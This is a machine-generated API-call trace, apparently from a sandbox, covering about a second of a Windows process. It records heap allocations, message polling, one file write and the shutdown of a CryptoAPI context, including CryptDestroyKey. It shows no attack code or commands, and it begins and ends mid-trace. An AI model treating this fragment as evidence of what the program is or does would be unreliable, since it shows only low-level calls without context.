RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0264.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0264.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c50) returned 0x2f2d178 [0264.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0264.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c50) returned 0x2f38a28 [0264.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2d178 | out: hHeap=0x970000) returned 1 [0264.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c50) returned 0x2f2d178 [0264.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f38a28 | out: hHeap=0x970000) returned 1 [0264.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c50) returned 0x2f38a28 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2d178 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f27520 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0264.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0264.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0264.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0264.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0264.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0264.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f218c8 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f32dd0 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0264.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0264.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0264.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0264.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0264.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0264.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0264.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1bc70 | out: hHeap=0x970000) returned 1 [0264.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c50) returned 0x2f3e680 [0264.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f38a28 | out: hHeap=0x970000) returned 1 [0264.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.988] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0264.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0264.989] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0264.989] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0264.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0264.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0264.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0264.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0264.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0264.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c50) returned 0x2f442d8 [0265.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.000] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f442d8*, nNumberOfBytesToWrite=0x5c50, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f442d8*, lpNumberOfBytesWritten=0x8cf5e4*=0x5c50, lpOverlapped=0x0) returned 1 [0265.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0265.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f442d8 | out: hHeap=0x970000) returned 1 [0265.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0265.002] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0265.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0265.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0265.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0265.002] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0265.003] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0265.003] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0265.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0265.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.004] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.004] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0265.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0265.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0265.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0265.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0265.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0265.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e519a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0265.004] CryptDestroyKey (hKey=0xa87250) returned 1 [0265.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0265.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0265.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0265.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0265.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0265.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.005] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.005] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.005] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0265.005] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.005] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0265.005] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0265.005] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0265.005] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.006] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.006] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0265.006] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0265.006] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0265.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0265.006] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.006] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.006] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.006] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0265.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0265.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.007] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.007] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0265.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.007] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.007] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0265.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.007] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.008] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0265.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.008] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0265.008] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.008] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0265.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0265.008] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0265.008] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: 